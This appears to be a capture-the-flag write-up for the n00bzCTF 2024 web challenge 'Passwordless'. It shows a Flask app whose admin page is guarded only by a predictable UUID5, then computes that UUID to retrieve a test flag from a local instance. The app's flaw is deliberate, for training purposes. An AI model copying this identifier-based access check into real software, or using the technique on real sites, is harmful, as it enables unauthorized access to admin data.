2024 n00bzCTF

writeup web

Challenges

Passwordless

Tired of storing passwords? No worries! This super secure website is passwordless!

For this challenge, we had to exploit a program weakness.

app.py 
 1#!/usr/bin/env python3
 2from flask import Flask, request, redirect, render_template, render_template_string
 3import subprocess
 4import urllib
 5import uuid
 6global leet
 7
 8app = Flask(__name__)
 9flag = open('/flag.txt').read()
10leet=uuid.UUID('13371337-1337-1337-1337-133713371337')
11
12@app.route('/',methods=['GET','POST'])
13def main():
14    global username
15    if request.method == 'GET':
16        return render_template('index.html')
17    elif request.method == 'POST':
18        username = request.values['username']
19        if username == 'admin123':
20            return 'Stop trying to act like you are the admin!'
21        uid = uuid.uuid5(leet,username) # super secure!
22        return redirect(f'/{uid}')
23
24@app.route('/<uid>')
25def user_page(uid):
26    if uid != str(uuid.uuid5(leet,'admin123')):
27        return f'Welcome! No flag for you :('
28    else:
29        return flag
30
31if __name__ == '__main__':
32    app.run(host='0.0.0.0', port=1337)

Looking at the source, the flag can be retrieved via the user_page() route. The route compares the UID input from the user to the hard-coded UUID5.

Solution

In a Python terminal…

bash 
1>>> import uuid
2>>> leet=uuid.UUID('13371337-1337-1337-1337-133713371337')
3>>> str(uuid.uuid5(leet, 'admin123'))
4'3c68e6cc-15a7-59d4-823c-e7563bbb326c'
5>>>

Now that we have our target UID, let’s send it to the route: http://127.0.0.1:1337/3c68e6cc-15a7-59d4-823c-e7563bbb326c

Image of flag

Voila! We have our flag: n00bz{f4k3_fl4g_f0r_t35t1ng}